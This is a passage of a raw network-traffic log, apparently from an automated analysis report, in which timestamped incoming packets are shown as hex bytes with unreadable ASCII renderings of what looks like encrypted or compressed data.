c8 94 de 92 28 8e fb dd e5 30 5c 72 07 9d 56 bd 76 72 a4 26 f9 12 26 ed 4e 26 50 1e 64 3b ae ec 3e a1 bc df 3a cd 3f 4b 4f f0 5a c9 3e d0 49 be 70 a4 c2 41 3e 2c d3 02 bb 56 48 bf ac Data Ascii: l+U}Q\|)x6z}1bSa<y"~o\k.''H%TSG;=+-Xm%`M+]b}O/p.F<_ 9w.9w=y3L0dfnUGu\>UHoL(0\rVvr&&N&Pd;>:?KOZ>IpA>,VH
2022-11-03 22:35:57 UTC	141	IN	Data Raw: f2 85 30 dd a0 69 60 1f 28 c5 9e 7f ff 2a b2 fc 39 65 81 66 8f 6f 4b d2 f3 eb 4f 1d 42 5f 5a e2 57 a5 0f 80 d6 ee 19 85 33 01 65 70 49 54 14 46 45 14 f0 73 46 1e 61 45 3d 61 f4 a5 b9 62 c2 28 dc bc 9a 37 28 55 76 25 a0 d1 0c 18 55 9a 05 04 a0 06 18 85 86 54 5a 3a 05 70 3f 3f 1a dc 31 85 a8 73 ed 26 cc dc 05 06 88 bb 0c f4 94 36 a6 eb 2c e1 2d 73 9b 06 e2 bf d4 61 89 51 cc 24 2d a8 0b cd 94 95 f3 8a ea 6d 63 c2 d1 05 5c e8 59 15 c2 3f 80 78 56 65 6d 28 4e 3a 94 7b 3d 94 0e bf d7 50 4b 28 6e c4 ed 30 b7 29 f9 24 1b 1f 1b b4 5c 06 c8 7d af 46 19 e1 3e ec 11 1f 1d 68 73 0e d1 38 08 a2 21 4c bb ff a1 6b 5e 26 e9 fa 58 3f 91 f0 52 6b c3 1e ce 27 1e 30 e9 bc c2 0c 33 18 90 da bb b4 ef c7 cc d6 ba b0 ff 4c e0 eb 5c 60 5d ec 4c d1 0c 3a 1c 97 6e 60 fa db cd c4 fc Data Ascii: 0i`(*9efoKOB_ZW3epITFEsFaE=ab(7(Uv%UTZ:p??1s&6,-saQ$-mc\Y?xVem(N:{=PK(n0)$\}F>hs8!Lk^&X?Rk'03L\`]L:n`
2022-11-03 22:35:57 UTC	148	IN	Data Raw: e1 5f c6 35 42 0a 25 c7 02 85 0c c0 f6 f8 50 f4 e9 14 64 84 29 77 ed 0b 9c a7 58 0c d7 1a 37 aa 1e 9e 9a a3 64 82 9a 25 44 e1 0e 31 1b 3a d6 fa 99 4e 95 4e 0b 41 08 e3 65 74 a4 57 ed 53 33 77 af 89 cb 48 9e 18 a0 36 3b 9a c0 bf 05 7e 7c 0f 85 09 5d b2 db 2e 9d 6d cc 90 f6 b7 92 5e 8a a8 cc bf a2 21 e1 d1 a7 6c 0c b7 b7 c3 19 5b 87 f9 93 cb 23 cb 10 6f cc f7 15 20 31 5c a3 8d 86 a0 13 70 a5 7b 59 94 ad 71 8c 37 90 a2 8f 91 6d fa 74 96 de fc 91 88 76 13 82 16 f9 77 16 9c 60 ac d0 76 6e 88 a5 7e e4 5b 2f ea 49 b1 ff 98 a6 ec a2 86 cc 17 fa 5e bc 36 16 dc 89 30 87 47 f8 c7 7e a7 e2 80 a7 d8 d0 fc 5b 5d c2 5b 53 c5 d5 b8 16 b7 ad 5c 9c 06 f9 4e d9 cb 78 47 58 72 24 ca 4a d2 f5 54 88 fc 3e 20 46 a8 25 93 fc 0d 7f 3d 74 db af 60 a9 d2 0f 02 7e b5 22 80 64 c6 95 Data Ascii: _5B%Pd)wX7d%D1:NNAetWS3wH6;~\|].m^!l[#o 1\p{Yq7mtvw`vn~[/I^60G~[][S\NxGXr$JT> F%=t`~"d
2022-11-03 22:35:57 UTC	156	IN	Data Raw: 0e 59 0d b7 0d 21 e7 a5 be 93 d9 7f 9c b0 31 b2 07 bd de ef 74 91 75 55 15 40 21 40 b5 21 8e dd 97 18 29 86 e0 aa 30 12 74 8a 49 7c a2 84 e7 d5 0b 77 8c cd 64 25 75 7a 25 1b 58 36 df 15 d2 54 cf 3a 1f ff 79 c8 d7 9e f6 da 63 65 7c af 8c 24 ea d9 63 e7 34 f4 cb 68 c8 1f a7 76 ee e3 35 35 5d ab f6 04 04 da 84 ed a0 1d 0e 04 5a 73 67 8b 44 e7 dc c5 d3 7e bb fc 66 f1 c8 2a e6 75 47 78 dc 68 ad 08 3c ca 0d ca 06 2e 5b b9 06 01 a0 20 4e 74 43 96 c6 ef 72 21 31 03 02 73 ae 79 47 33 7b 46 02 ca 9d b0 b4 5d 91 a3 b4 5b 8e 2c f9 fc 19 96 23 aa 7c 3b 78 f9 2a ff 15 43 eb 26 fb 62 57 84 ca 4d 5a 7f 08 df 77 53 79 28 6d dd 5c cb be af 26 88 14 bc 32 cf ec ca a3 20 84 54 57 99 28 ab c6 00 cc 0f fd 38 60 1a 72 3f 88 46 ee 9c 34 13 03 11 0b 64 5b 31 9d 73 a7 c3 92 b4 f3 Data Ascii: Y!1tuU@!@!)0tI\|wd%uz%X6T:yce\|$c4hv55]ZsgD~fuGxh<.[ NtCr!1syG3{F][,#\|;xC&bWMZwSy(m\&2 TW(8`r?F4d[1s
2022-11-03 22:35:57 UTC	164	IN	Data Raw: 82 9a 44 98 7d 25 cc ad 25 ca 3c 69 ab 57 d9 ad 0a 67 9e b1 5f 35 40 50 2b ca c5 65 e3 69 c5 2c 8b ab 3f e2 a1 87 44 5e bd 97 80 81 9b 57 77 70 e9 f0 f3 54 66 24 cd 05 50 8a 39 4f 74 94 e6 3a cc d6 9b f1 82 5a c4 23 dc 69 69 2d e1 c3 bb a0 c3 52 8b ab 64 d0 2f 0f b1 34 8c f8 89 09 8b 74 9d 3f a9 dc 88 8c b3 3b 58 51 83 5e 05 de c5 d2 c8 53 3b 72 31 ba a0 39 2f 31 53 d5 24 9e 29 9b 7d 9a 7d c4 2a 79 97 77 b4 4c 50 f4 97 48 b3 26 c3 8c 89 53 3c b6 55 67 29 e8 69 50 03 98 cb ee 60 f8 04 f7 e0 93 c5 12 a2 70 57 62 cf 4f 1c 64 d1 21 55 d0 b3 a6 fb aa 03 f2 d3 e7 c3 9b 7a 0c 06 d1 8e 1a 25 24 c7 95 f9 3d 03 0b 45 9b 09 11 23 3e a3 66 22 1e 67 ec ed 8f f1 14 cf 62 97 d5 ee ab 27 38 ab ff 0d a2 98 57 09 20 91 44 50 ae a7 8f 2a 08 07 fc 19 a7 7b 8e 28 26 f6 16 69 Data Ascii: D}%%<iWg_5@P+ei,?D^WwpTf$P9Ot:Z#ii-Rd/4t?;XQ^S;r19/1S$)}}ywLPH&S<Ug)iP`pWbOd!Uz%$=E#>f"gb'8W DP{(&i
2022-11-03 22:35:57 UTC	172	IN	Data Raw: 17 2f 59 4b f8 2a ff 63 7b a4 d9 47 1f 40 2d 82 00 b3 0d 82 da 12 d2 b6 6b f4 45 a3 72 2b 8f b9 f6 37 07 63 e6 7f 73 45 37 13 5f 4e 03 b5 ae d8 b6 30 61 17 d6 e8 c7 81 aa e4 3d 9e bc 2a 07 91 51 c0 bd e9 c5 73 03 8d 8f b8 de 0f ae d2 9a 6a b8 bf 99 0d 2a c0 c3 fc 3c bc e5 41 8f a5 28 7b 3b 80 57 81 bf 2a 3a 2d 48 66 71 9f 6c c3 0d 69 4a 96 f0 e7 06 09 e8 d8 ee 62 38 db 2d f1 68 46 9f 9a cc af de 28 e0 eb a8 00 7c b3 74 a0 7b 5d 89 db f0 22 90 ac c4 0a 7a 3a 3b 72 f8 49 d3 35 20 4b ab 22 c5 cd 95 f6 31 5e 88 88 5c 16 17 a4 e6 fd 1a d0 31 d0 11 59 da 25 4b 5c 1f eb 5b 2e 0e af ae 99 06 4e c7 00 44 a9 db 81 91 d5 70 de 27 13 09 2a 18 01 b0 0e 4a ae 88 70 95 cd 0f 48 33 10 a6 c2 cf 1f 5a 5f db 92 40 2c 2b c1 2a 8d b8 35 32 62 e1 cf dc bd b1 f0 7c 22 9e 08 91 Data Ascii: /YKc{G@-kEr+7csE7_N0a=Qsj<A({;W:-HfqliJb8-hF(\|t{]"z:;rI5 K"1^\1Y%K\[.NDp'JpH3Z_@,+52b\|"
2022-11-03 22:35:57 UTC	180	IN	Data Raw: 97 88 19 12 75 50 c1 38 ea e6 e6 44 a6 0e 2b 30 b6 53 d1 fc dc 8e 3e f6 db 52 da f4 e5 7b 5b 73 7d 69 3d 19 ce 95 df 43 3a 83 78 4f ac 5a 54 ac dc 2a ea 29 8b dd 9d b5 5c 05 0b 3a f2 e9 50 c1 23 e4 d4 86 ac d7 2a 8b a5 92 88 59 c7 91 ee 57 60 c9 e4 69 40 8a 7a 80 66 28 1c dd 23 f4 4b 04 8e 25 a1 03 97 98 cd d1 97 9b 26 2c 9a d0 49 b9 53 f0 74 d0 58 bd 35 cf 3b 1d f8 d7 f2 da 79 37 5e b4 c9 ea 56 1e d1 fc cb 80 3c 51 b4 f0 fb 1f 53 77 ba 88 ee 4c d6 62 d8 bc fe 73 7a 49 1b 17 0c d3 3f b0 dd ce 02 fb 52 41 a9 a6 ac c3 a7 88 14 a2 c3 44 d9 9d 2d af d4 49 3c 86 b0 a6 df 1b 7f 67 96 a0 f9 3e 66 da d8 6a 47 71 c7 58 d2 95 15 2a f6 0a e8 42 5e e7 7f 67 96 a0 f9 3e 66 da 38 2f fe 71 d9 83 f0 53 80 e5 46 c5 e5 45 60 25 51 54 65 03 e8 e2 e0 78 b6 53 d1 fc dc 8e 3e Data Ascii: uP8D+0S>R{[s}i=C:xOZT)\:P#YW`i@zf(#K%&,IStX5;y7^V<QSwLbszI?RAD-I<g>fjGqX*B^g>f8/qSFE`%QTexS>
2022-11-03 22:35:57 UTC	188	IN	Data Raw: e6 86 6f 60 b8 6d ed 56 fc ed 5a 20 0a 28 4f 6e 03 48 d5 d5 ce 68 4a 62 4e f3 90 8f e8 f9 70 72 a4 21 bf 12 d3 9a 69 14 82 85 12 0e c5 be 0b 61 2c a0 91 4e de 8c b3 64 50 a6 44 20 da 6e 45 f5 01 14 0c d1 f1 27 91 6b 1b 5a 62 59 c5 62 de d0 11 19 28 c2 d6 dc 30 6e 0a a0 9d 43 13 dd 3e af c9 ef 26 15 9d 9a 9d 69 ce 51 e7 2c 9f 64 7b 5a 66 31 88 90 66 54 93 c1 c1 50 1f e0 8e 54 41 5d cb 93 cf d6 41 c1 97 4c 9b 45 af 3f 74 51 9b 60 14 e2 66 dc dc c8 bb ca 85 79 2e a8 9d 81 1b 3b 89 2e 05 f0 41 42 64 55 c7 66 d5 12 07 a9 84 c7 e7 f7 48 b3 03 23 f7 ac 36 76 1a 9b 56 5a 39 6d 50 7e d1 7d f1 8d e9 b8 ee 7a bb 8c ca 5b 54 68 61 8f bb 0b 6d 7a 08 3d 66 77 63 ff b2 58 38 86 bd 2e f4 f6 89 6c da 5d 4c 44 26 d0 40 96 62 7b 2e 32 9d d6 73 30 4c 0c 3b 2a ed 56 65 75 89 Data Ascii: o`mVZ (OnHhJbNpr!ia,NdPD nE'kZbYb(0nC>&iQ,d{Zf1fTPTA]ALE?tQ`fy.;.ABdUfH#6vVZ9mP~}z[Thamz=fwcX8.l]LD&@b{.2s0L;*Veu
2022-11-03 22:35:57 UTC	195	IN	Data Raw: 1a 7d 75 0d 7e 63 60 ff 73 74 19 e9 83 f9 5c 56 d7 23 82 6f 62 8e 15 85 8c ed eb 52 ae ee 5f fc 29 d5 32 95 9d 3b 46 c0 26 bb d8 bf d1 b0 15 6d 32 ec 32 63 4c 8f 5e 82 87 9f 47 84 15 75 45 66 66 3f 1e 63 69 d5 8a 53 ab a4 86 e8 f9 8e 89 12 83 64 49 46 fd 0a 01 19 22 1d 30 08 97 c8 43 84 91 14 eb c4 53 bd 36 8d 5c 63 36 83 36 5e a7 37 45 ad 84 91 66 6b 58 79 e6 83 37 91 ab 5a 15 b1 fe c8 80 0a 90 1f 42 f1 97 f6 29 ae 01 18 b4 ce dd 2c 9e 9f 22 da 86 53 bb 9c 2b 05 7e 73 3c cf 6f ae e3 59 1c 1d 92 00 9e 43 e2 4a 88 41 f6 2a 8e 9f 5e 1b 42 bb ef 44 2a 19 2c 90 44 eb 46 a8 4a 43 45 00 c2 02 fb 4b e3 ab a1 1f d5 16 63 2b ba b2 45 e0 8d d9 d4 ba ef d1 f6 65 6c 4a b6 88 f7 66 ff ca 73 1d 18 32 77 48 20 56 5c fa a8 6c 0e 93 e6 fd 5b 62 5d e6 1e d1 03 76 46 2b 41 Data Ascii: }u~c`st\V#obR_)2;F&m22cL^GuEff?ciSdIF"0CS6\c66^7EfkXy7ZB),"S+~s<oYCJA^BD,DFJCEKc+EelJfs2wH V\l[b]vF+A
2022-11-03 22:35:57 UTC	203	IN	Data Raw: b4 b4 1f 51 ad 51 77 a1 82 a8 5e c1 9b af 14 52 08 e6 c8 8c 25 0e 8a 6b 39 f6 d4 f7 29 45 90 a9 91 36 2f f4 6b 30 52 e6 4d f3 0f 9c de c6 2b a1 0d 51 2f fe 60 6e a5 d8 dc b2 22 b3 60 ce 93 ae b9 76 4e 66 87 1b 3f 2b 94 ba 7c e0 63 a4 6e 4c e0 5a aa d9 60 c5 82 be c2 0d e8 64 98 9a 50 c5 83 1e 21 92 bd c8 90 7e 43 93 d7 05 70 c6 65 46 65 5f a7 4f ef fe 6f 1a f8 46 61 cb f2 c6 d6 e5 05 0e fa b3 b7 b7 d4 e3 c2 0d e8 64 98 9a 50 c5 e2 23 a4 a6 2d cd b0 9f 6d 9e ff ba 16 6c fe 5b 70 ac 6d de 8a 57 a9 d9 a1 ba ec d7 08 34 ee 05 d0 7b ec db a6 6a f0 2a 21 ad 71 69 6e 32 bb 3a 7c 46 58 14 5c ce 4e 9b d0 2a 61 4e 30 54 1e c2 f2 cf 6f 37 61 c5 a4 91 55 a7 3e c1 db 65 b3 69 15 e6 77 fa fb bd 1a f9 a7 f0 47 ae a5 31 55 42 b2 78 97 75 f9 dc bd e9 ed dd d5 8b 13 9c 43 Data Ascii: QQw^R%k9)E6/k0RM+Q/`n"`vNf?+\|cnLZ`dP!~CpeFe_OoFadP#-ml[pmW4{j!qin2:\|FX\NaN0To7aU>eiwG1UBxuC
2022-11-03 22:35:57 UTC	211	IN	Data Raw: 86 d5 f0 c9 d6 ac f2 5a 54 a9 53 9f 1c c1 f3 a3 73 d1 84 e1 c1 d5 59 40 49 42 86 5d 82 f2 82 46 fd 8b 32 f1 aa 7d 7b 43 36 97 50 54 a7 a4 92 03 f9 5c fa 54 33 88 15 41 54 78 8a 09 a7 de 67 57 82 15 76 ed 4f 93 5f b8 6f e2 a9 af 5b 4a ac 43 37 e9 ee 1d 27 9f 93 18 03 ca 97 33 80 fa 6d 20 f2 4a 7e b8 ca 3d 53 a5 5b 01 9a 10 4d f7 87 a4 f1 e4 6a dc 92 79 d4 0e 30 df e1 51 eb ea c1 db bb 6e 7f 56 68 16 2a 46 eb bb 25 f9 b2 03 91 3c e3 84 eb 71 ee fa 66 a6 38 5e 3f 03 25 e1 23 97 aa 73 d7 9c a0 43 21 e8 20 28 e0 01 23 33 08 1e 45 62 22 ba e1 b6 7d 51 8d b1 dd 1b 1b 84 b4 5b d0 00 ba cf e4 2e 06 17 e9 c8 39 b1 32 1d b9 a8 6e a0 43 5c bf a9 af ae 5e 78 65 83 64 ad d3 aa b6 02 e4 88 4b 7b 4d 1a 5c 48 af a0 bf 08 58 64 9e b8 94 0d 62 11 8b 8f ac 7d bf 01 e5 76 6d Data Ascii: ZTSsY@IB]F2}{C6PT\T3ATxgWvO_o[JC7'3m J~=S[Mjy0QnVh*F%<qf8^?%#sC! (#3Eb"}Q[.92nC\^xedK{M\HXdb}vm
2022-11-03 22:35:57 UTC	219	IN	Data Raw: 27 02 b0 42 55 ab bd 58 06 00 db 6e cd f5 d8 2b c5 54 3a dd d4 17 9e 8b 7c 6f a5 a3 7f 8b 24 c0 d5 57 0f 92 92 d5 7d c0 02 68 81 63 59 56 31 6c ba 55 64 dc 52 b7 7a ed 07 bd 68 ed 95 e7 24 79 6a 74 c4 d5 a9 60 81 d9 8f 21 f8 5e 57 7f 24 fa df f9 12 70 0b 3e 33 ab b6 64 65 d4 cb e7 0b 28 44 aa ff 05 30 e2 17 9d de 9a ed 40 73 45 61 c0 e8 d1 67 ea ff e9 75 ed 4f c4 ad cd ce 1d 22 01 a8 35 14 5a 4f 84 4b 04 fe 52 4f 66 d0 14 ca 5a 82 af 7c f8 d2 64 87 e6 b3 98 53 6b 52 87 ea 5e 3d 3c f6 f8 89 60 18 8a 58 df 0b 3a 11 92 79 83 ca c8 a1 0f 51 3c 22 12 9f 14 a2 bd b1 95 12 10 16 fd f4 1b 0e 90 ba d8 23 ff f1 b6 28 09 39 a1 62 1e 71 96 c7 90 5b fe 79 35 2b ed 44 c1 12 66 23 ca bc be e9 a3 48 80 c6 f6 cf b0 b5 da 5f e3 13 64 22 75 55 b1 f8 d6 2e 4c 62 48 07 fc 21 Data Ascii: 'BUXn+T:\|o$W}hcYV1lUdRzh$yjt`!^W$p>3de(D0@sEaguO"5ZOKROfZ\|dSkR^=<`X:yQ<"#(9bq[y5+Df#H_d"uU.LbH!
2022-11-03 22:35:57 UTC	227	IN	Data Raw: 20 ee 92 c2 20 c0 a5 4e d6 2c 3a 88 0e bc 9c ac c4 31 d3 4c 57 47 ec 92 57 85 9b 84 f0 e0 61 21 3e 3d 26 cb d5 e8 64 63 3c f4 3c b4 4a f2 a6 2f 9b c9 f4 96 76 cb c8 43 20 5e d3 0b b9 b3 ce e9 52 2d 3c 23 b8 3a d3 d5 1e 9c 3d 3e 2d 5a e6 02 b3 75 91 65 bc ca 98 8b c7 f6 33 6e 16 c9 d4 88 2b 7f 4c 31 1f 7c f3 33 2c 36 6d 2b a3 b3 f8 1f c7 00 35 aa 8e 11 9f ca ff 54 c1 fb a4 cd 31 2c 0e cf 3a 22 cb 19 70 6d a5 07 66 95 15 54 47 e8 b4 9e 61 02 d2 97 40 64 4a c3 fe f0 e1 68 d5 03 84 c0 4c df 91 c7 72 fa 79 e1 6e 69 aa 30 be 02 a4 3a 13 f8 0f c1 0a 33 5f 33 8e af 2b 8f a0 1e 0f bf bb ec 17 ae b4 49 71 98 11 3d 8f 12 0c 22 d7 51 fe 22 04 e6 b5 d5 8d 1d 4d db 2c b4 ff 2d 0a 5e e0 a9 a0 52 e6 f2 5b 55 1e 76 46 4e 2b ab 5b e6 1b 49 dc a2 62 42 d6 13 85 ac eb d7 f7 Data Ascii: N,:1LWGWa!>=&dc<<J/vC ^R-<#:=>-Zue3n+L1\|3,6m+5T1,:"pmfTGa@dJhLryni0:3_3+Iq="Q"M,-^R[UvFN+[IbB
2022-11-03 22:35:57 UTC	234	IN	Data Raw: fe ad 87 83 6b 34 26 ef 34 7f 8f af 32 4c 35 13 f5 3f 12 ae 5e cb 73 9b 22 2e 5f c8 f4 1e 83 63 01 f7 2f fa 8d 8c 61 c5 5c 5d 95 f1 50 c6 65 d3 a7 44 a6 f3 6b ff 5a 12 b5 33 1c 97 fe c7 38 6d f2 4d 64 09 6d 31 ee a5 9e b4 f2 20 92 19 dd 5d 94 6b 32 cf c2 bb 2a b8 9d b0 d8 ba c9 38 99 ad f2 22 f0 b3 90 ae e4 97 f9 29 86 b6 30 92 f1 f4 bb 51 db 31 aa fb 58 76 89 46 e1 70 71 e0 09 cf 2b 4f 50 03 e1 70 47 61 95 41 53 2b 71 e7 23 dd 4d 31 57 5a ea 2a ac 03 f3 87 32 e9 25 5e 41 50 92 86 ec a3 88 83 34 ec 34 78 9d 12 e8 e3 08 0d 53 92 c6 80 49 59 39 a1 8d b0 98 29 56 ee 62 91 f6 d7 df 60 ab c3 b9 f9 d0 0c ea 8c a5 e1 a3 93 e0 36 ed 39 bf e1 fc 52 c4 27 8a 67 e8 5c 99 fc d0 b5 1e 70 cf 4c 68 4b 22 19 44 e8 a5 36 9c da 9f 56 dd 92 ff 72 df 4d f6 1b be 42 50 02 83 Data Ascii: k4&42L5?^s"._c/a\]PeDkZ38mMdm1 ]k28")0Q1XvFpq+OPpGaAS+q#M1WZ2%^AP44xSIY9)Vb`69R'g\pLhK"D6VrMBP
2022-11-03 22:35:57 UTC	242	IN	Data Raw: 5f f6 b0 0e 2f 9a ba 75 22 35 75 04 44 33 53 96 f8 2e eb 52 cb b5 a2 9f 37 ee ea 00 41 10 bb e1 4b 28 49 69 2a 53 86 d4 37 e7 af a4 4b 3c 99 78 e2 05 a3 e0 0d 0b 73 49 db 97 3c ca 33 3f 91 bf 75 4c 3b 48 94 25 07 f6 fd b9 5b 5c e6 8f b1 a3 58 63 f5 ab 63 50 46 d1 b6 f0 18 4e 6c c9 c4 1a e8 d3 e4 c1 6c 10 36 2b 75 ec 08 b3 fc 32 0d 57 ab 3b 18 da ce bc b2 2a 8b 85 38 70 b7 ab 3d c8 7a 15 a2 16 46 06 ef 5a 1b fc 23 86 f4 40 75 9b 4f 68 e5 79 cd c1 f8 08 47 97 de 41 e0 ac 61 29 04 4a 70 a5 c6 54 2b a7 59 b7 65 62 71 8b 17 8e b0 db 46 d5 06 5e 3a 4a 6a bb 80 c8 95 bf 7b 69 97 37 73 aa da cf 30 9c 8c 36 0c 39 b0 52 32 41 16 90 58 53 1e 36 39 03 3c eb b9 b0 e9 d0 d4 f2 c1 be a5 3f 6d 78 2c fb 4c 31 5a cb f9 0a 5b 17 89 52 10 01 95 47 29 b4 2b 41 48 40 5b 52 4a Data Ascii: _/u"5uD3S.R7AK(IiS7K<xsI<3?uL;H%[\XccPFNll6+u2W;8p=zFZ#@uOhyGAa)JpT+YebqF^:Jj{i7s069R2AXS69<?mx,L1Z[RG)+AH@[RJ
2022-11-03 22:35:57 UTC	250	IN	Data Raw: 60 af 90 9d 94 19 54 93 44 ed 90 bd 51 64 d2 3a 44 54 00 74 35 8e 06 55 b1 03 7b 29 30 f5 fa 92 9d 50 7a ae bb ff 59 aa 77 6b ce cf c6 43 b4 ff 6b 8d 92 15 ea 14 e6 bd b8 ed 50 10 9c 96 67 eb 0b 9d fd dc 6a d1 47 81 58 94 13 29 2f 69 d1 dd ad 0c 90 a9 e9 81 96 84 11 60 13 f9 eb 60 c9 68 26 ca 1c aa ec 3a ec 2e d4 30 ad 72 89 9a 43 a9 74 f5 9b cd af 77 a3 62 54 3c 0c 9e 7d d4 15 46 66 1c 5d 73 d8 ca 30 dd 08 68 94 f8 73 4f c5 68 f2 08 e5 b9 72 cf 10 ec 52 a5 4d a3 5b d5 16 78 b3 c1 50 0d ba 30 12 c6 67 79 31 86 1e 03 58 82 ab 56 86 5f d8 50 fd 42 23 7d 48 81 cf 76 08 a9 fb c2 76 a5 ee a8 08 35 20 4e 13 46 23 f7 45 96 c6 4c ef 14 c4 a4 e2 b0 e3 07 8f 5f 2b dd 81 50 b5 fd ce fc 4f 57 e4 a3 8f 1a d9 fd 67 02 71 b8 76 a2 cd af e0 a7 cd 40 df ff 74 70 d7 b2 cb Data Ascii: `TDQd:DTt5U{)0PzYwkCkPgjGX)/i``h&:.0rCtwbT<}Ff]s0hsOhrRM[xP0gy1XV_PB#}Hvv5 NF#EL_+POWgqv@tp
2022-11-03 22:35:57 UTC	258	IN	Data Raw: 27 ef 60 10 64 9b 9f a2 35 63 2a 37 4f f1 1a 9f a3 3d c2 2b 8d 97 42 80 b6 07 44 af 8e 3d 37 4f 9c 25 61 81 58 13 6c 86 d2 fd 54 ed d7 e8 79 f5 c8 73 92 65 95 fb 6c dd ca 6b e5 4d 87 d1 6b 7d 3b fd 28 6a ed d8 2c 0b ed 91 91 8c 09 6e 52 41 49 b3 6f 6e 08 a4 16 72 08 98 25 4b d0 e2 42 7a 09 c6 18 7e 7a 69 f2 2a 0e a0 0f fb 21 f9 7b 16 ac 87 28 8b 09 77 7b bc 45 91 40 1d 1b 3b e0 a9 6e 71 08 2b 51 6f 47 f9 23 84 bf 3d e3 1b af b7 ea f2 ec f4 3e d3 5e a4 72 43 21 36 09 24 a8 50 7b 62 54 0a b0 a2 7c b2 a1 9e 37 fb 71 1a ed db cb d0 db f5 48 18 be f0 71 ca d8 8a 10 c1 05 81 d3 0b 59 24 fa d8 78 17 50 b2 7c 1f 99 41 89 f3 d6 99 03 62 0e 5e ea a3 69 15 49 93 0b ba b8 d9 69 c7 39 62 dd 90 b5 fc 5e 30 b3 5c 06 da 57 9c d1 d7 ce 1d a1 fd 5e a9 62 32 57 41 ba 8e f9 Data Ascii: '`d5c7O=+BD=7O%aXlTyselkMk};(j,nRAIonr%KBz~zi!{(w{E@;nq+QoG#=>^rC!6$P{bT\|7qHqY$xP\|Ab^iIi9b^0\W^b2WA
2022-11-03 22:35:57 UTC	266	IN	Data Raw: 47 29 3d 83 4e 06 f7 f5 4b a2 49 a8 9f fe 56 0c 29 12 90 17 63 b7 cc 01 10 55 2e a5 a1 39 03 e1 68 76 d1 3d 30 78 16 e5 12 e0 ff 84 88 bb df 3a 38 7c 3d 9c fa 44 77 52 74 3e 07 f3 bc 71 cf c9 bf ad 2f ce d0 49 56 36 e4 ae a5 35 4c 82 37 e6 fc 24 bf 72 25 ff 59 03 12 f3 bc 09 af f9 db 74 8e be 9d 6c 65 5a b8 db 4f 9f aa d7 50 de 38 7c be cc d7 fa d4 79 b3 6d 7c 27 77 72 83 8b 9a bc 57 82 5b 2a 5d 17 d8 23 6d d5 45 99 d1 39 67 7e 01 5b 3c 3f 5d b7 3b 16 d1 e4 08 bf 7e 34 cf 7a 96 74 5d b1 a9 bd 6f d1 80 a6 43 f9 3c 5a c6 ec 79 7e ae 3d e1 3c 4a 60 fc e8 6e b0 6f 8e f0 f7 a1 7d 18 75 e5 8c b9 de 0d 04 22 54 d3 26 90 52 fe 08 ab 0a 77 a2 46 df 13 03 11 f0 57 24 e4 e1 99 10 0b 99 df e4 f3 aa 96 9e 15 a5 fd 25 d7 c9 c7 9e 1e 87 6c 6a 1e be ee 4d fa ea b5 ae c3 Data Ascii: G)=NKIV)cU.9hv=0x:8\|=DwRt>q/IV65L7$r%YtleZOP8\|ym\|'wrW[*]#mE9g~[<?];~4zt]oC<Zy~=<J`no}u"T&RwFW$%ljM
2022-11-03 22:35:57 UTC	273	IN	Data Raw: 23 13 2a 87 65 ff b7 99 14 98 b6 79 e1 08 31 2e ec 18 b7 aa 4b 33 49 92 fa 80 cc cc 91 1f af 30 ad cd ce 1d 2b c6 58 db da 8d 99 4e 5f 55 79 9a 34 9f 0f f3 ef cd 08 26 aa b6 a8 c0 2a 83 4b be 7c b0 d2 04 b2 6d 2a 03 ca 33 f3 cf 9f d2 46 33 d9 d8 8c b3 e0 58 3f b5 44 e1 2e fd 36 1e 12 29 08 ef 81 db 62 3a 57 b0 8c a8 93 25 d1 eb 7d 81 af 78 36 a8 9b d2 3e f7 d5 02 e7 3d 14 bb 57 72 09 13 3a 82 05 b0 d1 a2 09 7d eb 80 3e de 26 c6 b9 30 42 d2 25 1e 8f c0 32 bb 35 69 8e 25 3d ac 2d 29 be 00 ca 85 0d ed 3e c5 67 e0 1a 41 e8 26 1b e1 41 99 12 5e 87 43 8d 37 de 61 fe 71 aa 3a b5 18 48 bd 4d 25 f5 2a 1f 70 52 1d 37 06 d3 78 ef e9 95 d5 d8 1d 0c 57 a7 c8 90 1c 08 bf d2 b6 77 ce ee 8d ec 49 cb 10 ee 0a ab 86 72 df 9f 72 46 ef 75 f7 fc d1 d4 ee b0 ab 0e d9 aa 31 53 Data Ascii: #ey1.K3I0+XN_Uy4&K\|m3F3X?D.6)b:W%}x6>=Wr:}>&0B%25i%=-)>gA&A^C7aq:HM%pR7xWwIrrFu1S
2022-11-03 22:35:57 UTC	281	IN	Data Raw: 59 c6 43 44 af a5 56 43 5d 7e 1c ac 8a 46 27 50 02 ad 41 2e c4 c3 05 d8 42 80 ec 94 87 f7 65 c4 79 11 98 9f 07 1c 7f 3b e9 70 93 8d 2e 25 04 9c fc 2c b6 f8 00 60 25 bc 19 19 b5 b5 fe d6 13 e5 0e a4 4c d1 b8 93 03 01 65 dc cd 22 78 0b 3c da 8b 85 97 14 c1 a1 76 c8 b7 70 63 20 30 2e 98 2a ab 90 42 7c b8 18 b2 c5 fd 2f 94 45 56 66 ba b1 02 b0 5b 6f fd 43 06 08 fb 5b d8 9a a2 74 d2 c6 63 25 4a ea 68 86 02 ce f6 a8 09 83 f1 6e ba 67 76 84 4c b0 3d 41 b3 01 03 19 2a 99 98 03 b5 83 75 e5 c5 36 a7 77 65 a5 3b 45 c9 49 3b 4a a4 73 31 d4 92 ca 48 4e 85 de 0c 79 08 cf 3d 4f 03 23 99 23 7e c5 6b 85 21 2a 8e c6 73 9a 5c 25 9f bf 05 d2 9c 88 56 a8 f8 60 13 ae 6d d5 da 93 bd bd 83 0b 2d c7 f9 00 4f e5 5a 8a 4f a2 c3 f0 e5 7d 1e 28 ab 65 c4 38 63 c8 61 da 75 ec 68 76 44 Data Ascii: YCDVC]~F'PA.Bey;p.%,`%Le"x<vpc 0.B\|/EVf[oC[tc%JhngvL=Au6we;EI;Js1HNy=O##~k!*s\%V`m-OZO}(e8cauhvD
